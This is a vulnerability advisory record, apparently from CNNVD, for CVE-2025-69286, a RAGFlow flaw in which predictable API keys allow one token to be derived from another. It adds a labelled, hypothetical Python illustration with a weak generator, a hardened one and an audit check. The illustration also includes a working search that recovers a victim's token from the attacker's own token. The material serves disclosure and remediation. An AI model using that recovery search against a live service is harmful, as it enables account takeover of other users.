CNNVD-202512-5499 Information

CNNVD ID

CNNVD-202512-5499

CVE ID

CVE-2025-69286

  • CNNVD Published: 2025-12-31

Description (translated from Chinese)

RAGFlow is an open-source RAG (retrieval-augmented generation) engine from InfiniFlow built on deep document understanding. RAGFlow versions before 0.22.0 contain a security vulnerability: the API key and beta token generation uses an insecure key generation algorithm, which can allow one token to be derived from another and lead to full account takeover.

Description (English)

RAGFlow is an open-source RAG engine based on deep document understanding. RAGFlow versions before 0.22.0 contain a security vulnerability caused by the use of an insecure key generation algorithm when producing API keys and beta tokens. Because the tokens are not independent random secrets, one token can be derived from another, which can lead to full account takeover. The fix is in release 0.22.0; keys issued by an earlier version keep their weak structure after an upgrade, so rotating them is the prudent follow-up.
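The record says only that the key generation algorithm was insecure and that tokens could be derived from one another. The block below is an added illustration of that bug class, written for this page; it is not RAGFlow's code, and the choice of a time-based (version-1) UUID as the weak generator is an assumption standing in for whatever the project actually used. It shows why such a token is derivable (only the clock field changes between two issues from the same process), an attacker-side search that recovers a neighbouring token given one known token and a validity oracle, the CSPRNG-based replacement, and the audit check a practitioner would run over already-issued keys. The function names, `NODE`, `CLOCK_SEQ` and the 100 ms search window are all hypothetical.

```python
"""Illustration of the bug class behind CVE-2025-69286: an API token whose only
varying input is a clock.  Hypothetical code written for this page, not
RAGFlow's own; the version-1 UUID generator is an assumed stand-in for the
"insecure key generation algorithm" the record does not specify further."""
import secrets
import uuid
from typing import Callable, Optional

# Assumption: a time-based UUID generator keeps the host node id and the clock
# sequence fixed between calls, so only the 60-bit timestamp (100 ns ticks)
# differs between two tokens issued by the same process.
NODE = uuid.getnode()                      # real generators embed the host MAC
CLOCK_SEQ = secrets.randbelow(1 << 14)     # chosen once per process
UUID_EPOCH_OFFSET_TICKS = 0x01B21DD213814000  # ticks from 1582-10-15 to 1970-01-01


def weak_api_key() -> str:
    """Weak (illustrative): the token is a version-1 UUID, i.e. clock + node."""
    return uuid.uuid1(node=NODE, clock_seq=CLOCK_SEQ).hex


def strong_api_key() -> str:
    """Hardened: 256 bits from the OS CSPRNG, no structure to derive."""
    return secrets.token_urlsafe(32)


def uuid1_fields(token_hex: str) -> tuple[int, int, int]:
    """Split a version-1 UUID token into (timestamp, clock_seq, node)."""
    u = uuid.UUID(hex=token_hex)
    return u.time, u.clock_seq, u.node


def uuid1_hex(timestamp: int, clock_seq: int, node: int) -> str:
    """Rebuild the 32-hex-char form of a version-1 UUID from its fields
    (same bit layout as uuid.uuid1, without building a UUID object per try)."""
    time_low = timestamp & 0xFFFFFFFF
    time_mid = (timestamp >> 32) & 0xFFFF
    time_hi_version = ((timestamp >> 48) & 0x0FFF) | 0x1000
    clock_seq_hi_variant = 0x80 | ((clock_seq >> 8) & 0x3F)
    clock_seq_low = clock_seq & 0xFF
    value = ((time_low << 96) | (time_mid << 80) | (time_hi_version << 64)
             | (clock_seq_hi_variant << 56) | (clock_seq_low << 48) | node)
    return f"{value:032x}"


def issued_at(token_hex: str) -> float:
    """What a weak token leaks on its own: its issue time as a Unix timestamp."""
    timestamp, _, _ = uuid1_fields(token_hex)
    return (timestamp - UUID_EPOCH_OFFSET_TICKS) / 1e7


def recover_sibling_token(known_token: str, is_valid: Callable[[str], bool],
                          max_ticks: int = 1_000_000) -> Optional[str]:
    """Derive a token issued shortly after a known one.  Node and clock
    sequence are copied from the known token; only the timestamp is searched,
    one 100 ns tick at a time, up to max_ticks (default 1,000,000 = 100 ms).
    is_valid stands in for the target API's own authentication check."""
    t0, clock_seq, node = uuid1_fields(known_token)
    for delta in range(1, max_ticks + 1):
        candidate = uuid1_hex(t0 + delta, clock_seq, node)
        if is_valid(candidate):
            return candidate
    return None


def looks_like_uuid1(token: str) -> bool:
    """Audit check for already-issued keys: a 32-hex-char token whose version
    nibble is 1 is a time-based UUID, not a random secret."""
    try:
        return uuid.UUID(hex=token).version == 1
    except ValueError:
        return False


if __name__ == "__main__":
    attacker_key = weak_api_key()   # the attacker's own, legitimately issued key
    victim_key = weak_api_key()     # a victim's key, issued moments later
    found = recover_sibling_token(attacker_key, lambda c: c == victim_key)
    print("victim key recovered from attacker key:", found == victim_key)
    print("attacker key leaks its issue time:", issued_at(attacker_key))
    print("uuid1 structure in hardened key:", looks_like_uuid1(strong_api_key()))
```

The search is cheap because the attacker copies the node and clock sequence from their own token and only walks the timestamp forward; against a live service the oracle is the API itself, so rate limiting slows the attack but does not fix it. `looks_like_uuid1` is the kind of check to run over keys issued by a pre-0.22.0 instance before deciding which to rotate; it catches this assumed generator only, not every weak scheme.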

Hazard Level

High

Vulnerability Type

Other

Affected Vendor

InfiniFlow

Published

2025-12-31

Last Modified

2026-02-24

References

  • https://github.com/infiniflow/ragflow/blob/v0.20.5/api/apps/system_app.py#L214-L215
  • https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/init.py#L343
  • https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/api_utils.py#L378
  • https://github.com/infiniflow/ragflow/commit/a3bb4aadcc3494fb27f2a9933b4c46df8eb532e6
  • https://github.com/infiniflow/ragflow/security/advisories/GHSA-9j5g-g4xm-57w7

Patch

https://github.com/infiniflow/ragflow/releases
